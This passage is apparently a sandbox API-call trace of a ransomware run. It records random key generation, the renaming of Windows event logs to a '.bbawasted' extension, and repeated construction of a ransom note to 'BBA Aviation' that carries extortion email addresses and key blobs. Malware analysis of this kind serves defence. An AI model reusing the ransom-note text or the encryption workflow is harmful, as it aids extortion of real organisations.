ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]CtHhqEic6p5dszyXj2wXDgxfJ1L/c9En/+/PQ+7eK1n6Pyc4ytEznRnJsaKggYCg\r\nZXUtbD/Rsl9ttEAtczDkg+cfeVySyiT5E1ls32L+vYOt1ZLMkF373FUeBq8dGGGo\r\niRba40mW0FJeZsS4lOQggJCk99w60w1OkFUhNiLfuQYfU7T4DZhT3bdF34ipYlii\r\ntNEXHG+R654/AKmN2eUUXzXtSSuim70U3wTYcf0YOrHc1TsfvftWG2amM2QiPB96\r\n3v5WwHZiQwB3dKEjcD4Lhv5RT1KI7QRoaAtv/8wjZ07kJtSGtt0lqrZwUFYFbZD6\r\nIQCfDdrSSIuHIG/2NRBd7NW+AToNJNgu7j2iembEsbs9Vbq6yJI6T5cmhbMOhoBA\r\nhKhek58ygTyYEOx0RUmSSQYiTUyRDhjneXg8OzsuBsUZ9D9SWrm0QlEq/kYSaRld\r\nE7HrlNzSzLpTXnHHT6UsfWuKAo3m4bsZ9l6Z7cqiaAa1bcDHIFx/+uEo3ruchyDu\r\noAEXQTTC2Ka8ZsUZ9oFjbLSP9egq+JzGAQLJ7dJwMCEfg+DZn/HImR4WVc0KJgcC\r\njRc6CyhjwpSsfhc6mVjf8n3tTEHAs8tLzJMHf1+lZEIvNDmJknIK8qfsazww39f0\r\nQ+AySW8L973NXvsUBoP78qs9trqnr80vNyBoaNtQoDB=[end_key]\r\nKEEP IT\r\n") returned 984 [0180.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0180.441] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0180.441] SetEndOfFile (hFile=0x28c) returned 1 [0180.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0180.448] CloseHandle (hObject=0x28c) returned 1 [0180.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0180.450] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a6e68 | out: hHeap=0x660000) returned 1 [0180.450] _aulldvrm () returned 0x0 [0180.450] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a61b8) returned 1 [0180.451] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0180.451] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0180.451] lstrlenW (lpString="\\\\?\\C:\\Logs\\Internet Explorer.evtx") returned 34 [0180.451] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24e) returned 0x6ae598 [0180.451] lstrcpyW (in: lpString1=0x6ae5dc, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0180.451] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0180.451] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6b48) returned 1 [0180.452] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0180.452] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0180.452] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Internet Explorer.evtx.bbawasted_info" (normalized: "c:\\logs\\internet explorer.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0180.453] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0180.454] SetEndOfFile (hFile=0x28c) returned 1 [0180.454] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0180.455] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0180.455] lstrcpyW (in: lpString1=0x6ae5dc, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0180.455] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Internet Explorer.evtx.bbawasted" (normalized: "c:\\logs\\internet explorer.evtx.bbawasted")) returned 1 [0180.456] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Internet Explorer.evtx.bbawasted" (normalized: "c:\\logs\\internet explorer.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0180.456] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0180.456] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0180.456] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0180.456] CloseHandle (hObject=0x294) returned 1 [0180.471] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0180.472] CloseHandle (hObject=0x280) returned 1 [0180.472] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0180.472] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6ce0) returned 1 [0180.473] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0180.473] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0180.473] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a5f98) returned 1 [0180.473] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0180.473] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0180.484] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0180.484] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0180.484] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0180.485] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]IQAPIYLx4Y63BZh0eFIaeoqo/nQ4RNr8LXnvRC4sIfww5IoHNyMA4OfUUMJhSPGt\r\nlRADQbkRs8yT4RHFbpr++UgQfI19AwY9TZxxORqpwazJ7NjpO4WxEyKW2lCBa3pq\r\nDgfNMlr35HfafMzM5v8gNdkgOA7YDzRVDpF0Tl1rAUO1eic5/Hb2OFQjcddTMM/w\r\nEMzKMAz6yB4tKSAt7ZO/oplMosYgXu0l5O4T2yPgKjK81PnVZhGDJ7ScWrgF6W0z\r\nfanbQF/XbB/liyemv59xi/kKPeKjMe8+31cdPYOMUerD2DJmqpwM7WbdDJNEzhHc\r\nDX9tZdVbOkprWP3LpJ5CnH8Zx/pspoI18Dc3+yUpaiFL0JV34zC99Jcx/ll/PHvc\r\n4Bls2KgsMQXfgXEFyHs5RChmn+s00XMwKKB4uZkeTJWCrdiLC+qahgZHRTPgKzuB\r\nil5z5sI/Qu1N/JLAD1o2qXCu/1N3Zh7qzWIPQ3RMcrjahjROMl36lu41S/hqAkzx\r\n4Dh7rCzCig9KtaeZYIyJehdBc1n33vy9fRL7/+7HgxJKlCKEBOcf6q0HEvlMbYCt\r\npkKiPcGT/DCUOaUkuO3c429pfS9nBZKEE50RBcwAAELJ57/2H1TBGkFGm0y5Dd9u\r\nyRP1/GzPPsovo+o1mX1k2zCEkk8NZQcqz9S+H/QDtoc=[end_key]\r\nKEEP IT\r\n") returned 984 [0180.485] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0180.485] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0180.485] SetEndOfFile (hFile=0x28c) returned 1 [0180.488] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0180.488] CloseHandle (hObject=0x28c) returned 1 [0180.490] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0180.490] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a6f00 | out: hHeap=0x660000) returned 1 [0180.490] _aulldvrm () returned 0x0 [0180.490] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6790) returned 1 [0180.735] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0180.735] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0180.735] lstrlenW (lpString="\\\\?\\C:\\Logs\\Key Management Service.evtx") returned 39 [0180.735] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6aecf0 [0180.736] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0180.736] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0180.736] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a65f8) returned 1 [0180.736] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0180.736] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0180.736] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Key Management Service.evtx.bbawasted_info" (normalized: "c:\\logs\\key management service.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0180.737] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0180.738] SetEndOfFile (hFile=0x28c) returned 1 [0180.738] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0180.738] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0180.738] lstrcpyW (in: lpString1=0x6aed3e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0180.738] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Key Management Service.evtx.bbawasted" (normalized: "c:\\logs\\key management service.evtx.bbawasted")) returned 1 [0180.739] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Key Management Service.evtx.bbawasted" (normalized: "c:\\logs\\key management service.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0180.739] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0180.739] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0180.739] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0180.740] CloseHandle (hObject=0x280) returned 1 [0180.773] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0180.773] CloseHandle (hObject=0x294) returned 1 [0180.773] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0180.773] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6570) returned 1 [0180.774] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0180.774] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0180.774] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a61b8) returned 1 [0180.775] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0180.775] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0180.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0180.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0180.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0180.784] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]JeaskhTtTSzwLKdiYFzAZIpOvQ5PQ+D3tFn7IkcFOkTRPoUhDxzmRrPPYSDS09fn\r\ne1Fn40IuOjdf1IEVH87DZ+Ur7/jkqCYHOKmfiwigm6xMWiRefiINs8N/noFZiFUb\r\ncmm09LJEWmlfY8igv5d+Xt+QUwnHct6iMCZE4eQxzdFiQnLXfypf2F0jvrimGftd\r\nkcv5y1HMzXD82GzIr6b0++GQIZnTPVt85EuVgvTFL+VhjZR/pJHCeul7aNwI3a/R\r\nhOd6VgD5kZRleeVe3mBTR4INL+b6jajjL0Nx0uuIy+OV9Si2N4T1/7CUwkZP7VBr\r\nMlOxBIIsP/5zFEd4DexuwP6tzCS9Pl4uUVXw5mySWvp7q+ppJ7Uu+TS2uVCvH853\r\noRT2/dcePN5Gol1OrKdvcw8YuCA1TctwZl1i6WcCXHyumaD7y8AsKtP8mMZwAwou\r\nYdK/X8NGfvxpQqF624qMTZ1AiBM3a4RMc29sHmb9m425DceEyjxh4BNpCkLrLf/B\r\niOqH6cpOQN0FmeTA9Q4DFBBWUsxDfxwjSeL0YVcMHR5xbVUu++B6NAFnr6xUvMPE\r\nNnohRPQS7PZVCSoRTWUjyvD4QUpXFK1Qyv5RM4EXAUyErtEnJScVKzG5SRMf56Vt\r\nkKrw1yjBNo9cTyYb90XH4rLnMJKdGYo6ln83VriS3Ke=[end_key]\r\nKEEP IT\r\n") returned 984 [0180.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0180.784] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0180.784] SetEndOfFile (hFile=0x28c) returned 1 [0180.786] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0180.786] CloseHandle (hObject=0x28c) returned 1 [0180.788] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0180.788] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a2bd0 | out: hHeap=0x660000) returned 1 [0180.788] _aulldvrm () returned 0x0 [0180.788] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6020) returned 1 [0180.789] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0180.789] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0180.789] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 59 [0180.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x280) returned 0x6aecf0 [0180.789] lstrcpyW (in: lpString1=0x6aed66, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0180.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0180.790] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a61b8) returned 1 [0180.790] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0180.790] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0180.790] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0180.791] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0180.792] SetEndOfFile (hFile=0x28c) returned 1 [0180.792] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0180.792] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0180.792] lstrcpyW (in: lpString1=0x6aed66, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0180.792] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx.bbawasted")) returned 1 [0180.793] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0180.793] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0180.793] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0180.793] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0180.794] CloseHandle (hObject=0x294) returned 1 [0180.832] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0180.833] CloseHandle (hObject=0x280) returned 1 [0180.833] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0180.833] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a60a8) returned 1 [0180.833] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0180.833] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0180.833] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6680) returned 1 [0180.834] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0180.834] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0180.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0180.843] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0180.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0180.843] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]jqby/MRKlgpmXrr89BIYR8t2bhGJRrqQnF9rEMk73AigiQz3ZXwmoH/Wco53Uazh\r\nd+Pn8+2Z4vYi3AV8D1bLiJmGslrHeGMPkGxJZ1Te0bl/+BYSMXjUfle3eGkqkdou\r\nf3Yv5d4KcrY1my7+cA9q9chuWxxYO2ZHu1EoxPbiEjPzVavu/kpL9GULFZu/abru\r\nXd14J0b7JyKa8SxRHnqhMY/pe+fp8Z5UgKSV9gE1wNs40Txh0EwciKowvdtZ44lw\r\nRqs7nJrRMYNLfEZ7rSY3pZTqZAylx/6yxux5pyuM1YKjy89OMywAHQQ3oF1qTg72\r\n9HZmD6IfOaYmEfSlZ5+GzyRwzCO/uK2iaEtAV8pGyb5IV+lXZYmkHh2jmKY/+FY+\r\ndvTiLXT+TJlodkk+lzRzZdhdrfI63vcCv9BNZ2euOIxg6ItFJD2WgXU+V6vxqJSc\r\nE7JNmSU9QQGSdbGGvZLsG9rzE7/2/NHbhEQIWi5afVEywWKfHsl6NG/FZlQc5vP+\r\noMIAKRVJtKYquZxb3ijPLFJVpd7/mYQvHksefwXJsDxZAc1MKbKP9sIluGQ5+0kb\r\nFxOHeMyUK4FVkJl6yUWBbi8bYlSOAAb4bbzxQ1pwcy5H4UHkwHeadt/Mnfd597pU\r\nj3wtggh8QqcOSSaBXkSN62F3QUvwm1uFnGRCfE6SVH+=[end_key]\r\nKEEP IT\r\n") returned 984 [0180.843] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0180.843] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0180.844] SetEndOfFile (hFile=0x28c) returned 1 [0180.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0180.847] CloseHandle (hObject=0x28c) returned 1 [0180.849] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0180.849] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0180.852] _aulldvrm () returned 0x0 [0180.852] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a63d8) returned 1 [0180.853] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0180.853] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0180.853] lstrlenW 